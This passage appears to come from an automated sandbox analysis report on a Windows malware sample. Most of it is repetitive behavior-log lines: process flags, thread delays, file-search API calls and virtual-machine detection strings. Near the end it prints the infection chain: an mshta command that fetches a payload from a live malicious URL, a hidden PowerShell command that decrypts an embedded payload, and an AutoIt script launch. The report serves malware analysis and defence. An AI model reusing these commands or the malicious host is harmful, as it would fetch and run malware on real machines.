      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2008
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1218
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4364
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5344
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 819
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7330
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2313
      Source: C:\Windows\System32\mshta.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\DonaldDuck[1]
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | API coverage: 4.9 %
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 7316 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612 | Thread sleep time: -13835058055282155s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036 | Thread sleep count: 7330 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052 | Thread sleep count: 2313 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 | Thread sleep time: -7378697629483816s >= -30000s
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001EA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 15_2_001EA187
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001DE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 15_2_001DE180
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001EA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 15_2_001EA2E4
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001EA66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 15_2_001EA66E
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001E686D FindFirstFileW,FindNextFileW,FindClose, 15_2_001E686D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001DE9BA GetFileAttributesW,FindFirstFileW,FindClose, 15_2_001DE9BA
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001E74F0 FindFirstFileW,FindClose, 15_2_001E74F0
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001E7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 15_2_001E7591
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001DDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 15_2_001DDE32
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015CAE75 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 15_2_015CAE75
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015CD545 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 15_2_015CD545
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015CD64D FindFirstFileA,GetLastError, 15_2_015CD64D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_0155A20D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 16_2_0155A20D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_0155C9E5 FindFirstFileA,GetLastError, 16_2_0155C9E5
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_0155C8DD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 16_2_0155C8DD
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_0018310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 15_2_0018310D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: svchost.exe, 00000004.00000002.2955127845.000001A5E4C27000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`sE
      Source: mshta.exe, 00000003.00000003.2259299452.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2251457783.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248766174.000001FD64F9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264087068.000001FD64F9D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@!
      Source: mshta.exe, 00000003.00000003.2248766174.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2251457783.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264087068.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2259299452.000001FD64FD5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWZ
      Source: powershell.exe, 00000007.00000002.2231693056.0000014E4E0C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: AutoIt3.exe, 00000010.00000003.2002348869.00000000015A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vmware
      Source: AutoIt3.exe, AutoIt3.exe, 00000010.00000003.2002348869.00000000015CC000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1999895717.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2005623906.00000000038DB000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1999631456.0000000001601000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.2005353723.0000000001553000.00000040.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2000665888.0000000001554000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2002544632.000000000157E000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2002876668.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2002544632.00000000015A2000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.2002348869.00000000015A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft hyper-v video
      Source: mshta.exe, 00000003.00000003.2253505540.000002056BBF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
      Source: mshta.exe, 00000003.00000003.2258761903.000001FD65026000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248078541.000001FD65026000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2264358180.000001FD65026000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2957377572.000001A5EA455000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 0000000D.00000002.2160134998.000001887ECC2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
      Source: mshta.exe, 00000003.00000002.2266013552.0000020567A90000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\6
      Source: powershell.exe, 00000007.00000002.2225276243.0000014E4DF80000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: mshta.exe, 0000000C.00000003.2191192579.000001C2D424C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2209666982.000001C2D424D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | API call chain: ExitProcess graph end node
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001EF607 BlockInput, 15_2_001EF607
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_00182D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 15_2_00182D33
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_0018310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 15_2_0018310D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_00194BF4 mov eax, dword ptr fs:[00000030h] 15_2_00194BF4
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015DC135 mov eax, dword ptr fs:[00000030h] 15_2_015DC135
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015E201A mov eax, dword ptr fs:[00000030h] 15_2_015E201A
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015E2021 mov eax, dword ptr fs:[00000030h] 15_2_015E2021
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015EDF8E mov eax, dword ptr fs:[00000030h] 15_2_015EDF8E
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_0157D326 mov eax, dword ptr fs:[00000030h] 16_2_0157D326
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_015713B2 mov eax, dword ptr fs:[00000030h] 16_2_015713B2
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_015713B9 mov eax, dword ptr fs:[00000030h] 16_2_015713B9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_0156B4CD mov eax, dword ptr fs:[00000030h] 16_2_0156B4CD
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001D20BE GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 15_2_001D20BE
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001A2446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_001A2446
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_00190E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_2_00190E4D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_00190F9F SetUnhandledExceptionFilter, 15_2_00190F9F
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001911EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_001911EE

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7436, type: MEMORYSTR
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7956, type: MEMORYSTR
      Source: unknown | Process created: Base64 decoded .'mshta'https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001D230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 15_2_001D230F
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_00182D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 15_2_00182D33
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001DC078 SendInput,keybd_event, 15_2_001DC078
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001F2E89 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 15_2_001F2E89
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('…');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001D1C68 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 15_2_001D1C68
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001D2777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 15_2_001D2777
      Source: AutoIt3.exe, 0000000F.00000000.1972604389.0000000000231000.00000002.00000001.01000000.00000011.sdmp, AutoIt3.exe, 00000010.00000000.1997409571.0000000000231000.00000002.00000001.01000000.00000011.sdmp, AutoIt3.exe.7.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: AutoIt3.exe | Binary or memory string: Shell_TrayWnd
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_00190CA4 cpuid 15_2_00190CA4
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 15_2_015CB04D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: GetLocaleInfoA, 15_2_015D001D
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 15_2_015CB157
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: GetLocaleInfoA,GetACP, 15_2_015D1569
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: GetLocaleInfoA, 15_2_015CB971
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: GetLocaleInfoA, 15_2_015CFFD1
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 16_2_0155A3E5
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: GetLocaleInfoA, 16_2_0155F369
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: GetLocaleInfoA, 16_2_0155F3B5
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 16_2_0155A4EF
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: GetLocaleInfoA,GetACP, 16_2_01560901
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: GetLocaleInfoA, 16_2_0155AD09
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
